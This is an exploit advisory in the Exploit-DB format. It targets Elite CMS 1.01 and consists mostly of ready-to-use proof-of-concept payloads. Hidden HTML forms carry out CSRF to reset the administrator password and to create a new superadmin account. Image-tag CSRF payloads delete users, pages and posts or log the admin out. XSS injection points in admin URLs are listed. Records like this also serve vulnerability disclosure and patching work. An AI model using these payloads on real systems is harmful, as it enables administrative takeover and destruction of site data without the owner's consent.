Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities

EDB-ID:

14318

CVE:

N/A


Author:

10n1z3d

Type:

webapps


Platform:

PHP

Date:

2010-07-10


# Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
# Author: 10n1z3d <10n1z3d[at]w[dot]cn>
# Date: Sat 10 Jul 2010 08:05:44 PM EEST 
# Vendor: http://elitecms.net/
# Download: http://elitecms.net/download.php?download=eliteCMS

-=[ CSRF PoC 1 - Change Admin Password ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/edit_user.php?user=1" method="post">
                <input type="hidden" name="password" value="pwned" />
                <input type="hidden" name="email" value="pwn@pwned.com" />
                <input type="hidden" name="first_name" value="pwned" />
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 2 - Create Admin User ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/new_user.php" method="post">
                <input type="hidden" name="user_name" value="root" />
                <input type="hidden" name="password" value="root" />
                <input type="hidden" name="email" value="root@root.com"/>
                <input type="hidden" name="first_name" value="root"/>
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 3 - Delete User ]=-

    <img src="http://[domain]/admin/delete_user.php?user=2" alt="Do you see this?" />

-=[ CSRF PoC 4 - Delete Page ]=-

    <img src="http://[domain]/admin/delete_page.php?page=1" alt="Do you see this?" />

-=[ CSRF PoC 5 - Delete Post ]=-

    <img src="http://[domain]/admin/delete_post.php?post=1" alt="Do you see this?" />

-=[ CSRF PoC 6 - Logout The Administrator ]=-

    <img src="http://[domain]/admin/logout.php" alt="Do you see this?" />

-=[ XSS ]=-

    http://[domain]/admin/edit_page.php?page=1[XSS]
    http://[domain]/admin/edit_post.php?page=1[XSS]
    http://[domain]/admin/add_post.php?page=1[XSS]

Also all of the text fields in the administration panel accept xss code.


Not so l33t huh?
Visit us at http://www.evilzone.org/.